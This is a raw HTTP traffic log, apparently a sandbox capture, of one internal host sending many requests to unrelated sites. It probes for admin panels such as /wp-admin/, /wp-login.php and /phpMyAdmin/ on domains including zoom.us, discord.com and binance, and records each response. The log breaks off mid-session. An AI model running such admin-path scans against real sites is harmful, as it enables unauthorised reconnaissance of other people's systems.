Feb 5, 2024 12:16:08.025955915 CET | 1280 | IN | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:07 GMT
Etag: W/"613f221d-3feb"
Logid: 8900820139405424391
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900820139405424391
Yme: ZIGW/y8rX0wSdTQEUmr/tG5LtOUfTwLrrgNFwSCLmQ==
Transfer-Encoding: chunked
Feb 5, 2024 12:16:08.239218950 CET | 1280 | IN | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:07 GMT
Etag: W/"613f221d-3feb"
Logid: 8900820139405424391
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900820139405424391
Yme: ZIGW/y8rX0wSdTQEUmr/tG5LtOUfTwLrrgNFwSCLmQ==
Transfer-Encoding: chunked


Session ID    Source IP      Source Port    Destination IP    Destination Port
363           192.168.2.6    61955          36.255.71.45      80
Timestamp    Bytes transferred    Direction    Data
Feb 5, 2024 12:16:06.892966032 CET    188    OUT    GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.264568090 CET    162    IN    HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://instructory.net/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


Session ID    Source IP      Source Port    Destination IP    Destination Port
364           192.168.2.6    62586          104.21.5.25       80
Timestamp    Bytes transferred    Direction    Data
Feb 5, 2024 12:16:06.899399996 CET    173    OUT    GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.024399996 CET    699    IN    HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ukxxxIYCeSZoG1zKZ9OkywrIoBpX%2Fvo2hSfHSu1mtCgYg8HuaakzHaEHFzffO%2BPZb3nZo1WuDCQ9x%2BR0t%2BJ4ZCenxxtZQDAEYTxEHqUEfMj2uCVSCoF74ZitfnN45NkLFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd4778ae2444-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP     Destination Port
365           192.168.2.6    62588          172.67.170.147     80
Timestamp    Bytes transferred    Direction    Data
Feb 5, 2024 12:16:06.900527954 CET    182    OUT    GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.178920031 CET    820    IN    HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LEiEnN7eUtSbRxUkPP9%2BrFjNBM9UuzIfTHMv2gHCK5csRln5LaqCJbDe9El1d6tRCog7WmGxR2BMdueYgG737oAF9HLCTTkYPguaBFY4WyLV8AAtrJ8v19C9jfk8Y0GA5VxCoVnrUjs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd477b786759-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>
Feb 5, 2024 12:16:07.178936958 CET    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID    Source IP      Source Port    Destination IP    Destination Port
366           192.168.2.6    62498          186.113.7.204     80
Timestamp    Bytes transferred    Direction    Data
Feb 5, 2024 12:16:06.933844090 CET    188    OUT    GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.122450113 CET | 151 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
Feb 5, 2024 12:16:07.400717974 CET | 151 | IN | HTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
367 | 192.168.2.6 | 62678 | 44.195.133.145 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.961585045 CET | 180 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.077009916 CET | 583 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>
Feb 5, 2024 12:16:10.221062899 CET | 382 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://ucv.blackboard.com/wp-login.php
Feb 5, 2024 12:16:10.336522102 CET | 364 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
368 | 192.168.2.6 | 62679 | 170.114.52.4 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.961663961 CET | 177 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.084933996 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pzltbOBqF8JXsnoSuIxq6Q7NGRv8VSvvRQDUYmzam%2FdfI6BX9U1pysWRxODqHpcxQ%2FvYvqajSs10Beljjk7pF0ijMV8Wp1r2lJ2AJx57o%2BH2q22TodC0XkofT04d7L37WA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd47d9197bd0-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:16:07.085454941 CET | 383 | OUT | GET /wp-admin/ HTTP/1.1
Host: us04web.zoom.us
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://us04web.zoom.us/wp-login.php
Feb 5, 2024 12:16:07.242592096 CET | 764 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 134
Connection: keep-alive
Location: https://us04web.zoom.us/wp-admin/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ptaHaj6lY0ZQ2KtUu01%2BecgItKObaV7Qf7UoIw%2BzGhfcktqjFOBPAcvUh8pm3%2BS3iaHsdN4l%2FgP5vCKA4guGd6%2BP3sqtd%2FLZHlsAa%2Bw9enFZCRoOgBlltBsLaeqNxmGLZg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd4899c37bd0-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
369 | 192.168.2.6 | 62769 | 3.161.136.2 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.977035999 CET | 179 | OUT | GET /wp-admin/ HTTP/1.1
Host: accounts.binance.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.078733921 CET | 579 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://accounts.binance.com/wp-admin/
X-Cache: Redirect from cloudfront
Via: 1.1 4b4ef7cefd8f81a1e60437d0590406b8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P4
X-Amz-Cf-Id: j8tJEbDLibjfVEAG1-AvQACJLF9IQgTdO0E2eKvy5cKuLQIq3dwGZw==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
370 | 192.168.2.6 | 62607 | 54.71.181.160 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:06.979877949 CET | 182 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.153340101 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:15:21 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:16:07.153357029 CET | 97 | IN
Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
371 | 192.168.2.6 | 62860 | 162.159.135.232 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.027205944 CET | 173 | OUT | GET /wp-login.php HTTP/1.1
Host: discord.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.155567884 CET | 933 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:07 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:16:07 GMT
Location: https://discord.com/wp-login.php
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wwQ0g6Z%2BPKJxStwA0m3P2dlUjH9cixSFmIJZFVbfjlPiD7AA7BgzIz38yIiUY8dtTqiEJj2RgYtkjXpQCIYXeEDDeQbNQ%2BgLact6DScGiBhIfvh4b5vyejSwT5kR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; path=/; domain=.discord.com; HttpOnly
Set-Cookie: _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000; path=/; domain=.discord.com; HttpOnly
Server: cloudflare
CF-RAY: 850abd4839ffb133-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:16:10.463277102 CET | 362 | OUT | GET /wp-admin/ HTTP/1.1
Host: discord.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: https://discord.com/wp-login.php
Feb 5, 2024 12:16:10.588116884 CET | 691 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:10 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:16:10 GMT
Location: https://discord.com/wp-admin/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SmmUDE%2BqEeq4P1oCREyUryhMIBHTE9Mvl99Fgxjb2PogSm9LOEgC14RR7LMW7PyCFyqVlmRKWsW405%2Fqhd0JJPj6qqyUqakVmzqadLtNgQQE%2BNyMkfCQNodBf%2FO4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 850abd5dbfcdb133-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
372 | 192.168.2.6 | 62626 | 64.190.63.111 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.032529116 CET | 170 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.244599104 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:07 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
373 | 192.168.2.6 | 62925 | 172.66.43.117 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.072779894 CET | 167 | OUT | GET /admin HTTP/1.1
Host: login.adf.ly
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.228473902 CET | 1286 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
cache-control: no-cache, no-store, must-revalidate, max-age=0
location: https://login.adf.ly/admin
x-frame-options: SAMEORIGIN
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oxoIm0HdwJ%2BX7MwgUQtKFItbFDuXlxx%2Fsx96eH0dYZ8fzpREroD7OpPx1rsEjl3wfaL0vA0Zi6UV3glRD6m5fKCAnMyMvB0H2OjdJXdOuXSR4YjHTXqXWApxpX5gW6g%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abd488fe24503-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: 2ab<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style
Feb 5, 2024 12:16:07.228610992 CET | 126 | IN | Data Raw: 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 74 65 6d 70 6f 72 61 72
Data Ascii: ="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
Feb 5, 2024 12:16:07.228626013 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
374 | 192.168.2.6 | 62931 | 104.21.60.188 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.078630924 CET | 166 | OUT | GET /pma/ HTTP/1.1
Host: netizion.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.228451967 CET | 664 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:07 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:16:07 GMT
Location: https://netizion.com/pma/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Zzy%2B8qmroyl5umI6FHJH2sS0iHKj28oQ9UcbTnpgVnuj4CEiTgzAPkCv%2B9F0x%2FGCzsCsXKMYyGDCV0CpvcnJFfIEAAPVahuXoOT7VMTPzOslNnFpUbiW%2BELzI%2Fho%2FVE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abd489aaf6777-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
375 | 192.168.2.6 | 62773 | 34.250.93.112 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.078690052 CET | 168 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: kwyk.fr
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.280987978 CET | 409 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 194
Connection: keep-alive
Location: https://www.kwyk.fr/phpmyadmin/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
376 | 192.168.2.6 | 62948 | 3.161.136.2 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.081423044 CET | 181 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: accounts.binance.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.182934999 CET | 581 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://accounts.binance.com/phpmyadmin/
X-Cache: Redirect from cloudfront
Via: 1.1 22faf6fcae096ee97264521770b65762.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P4
X-Amz-Cf-Id: uSQt9a441ccESUXVAmejpyKGzy-FBx8kIxTqixjsV24HW7TkkYmqYg==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                377192.168.2.662947142.250.105.8480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.081446886 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
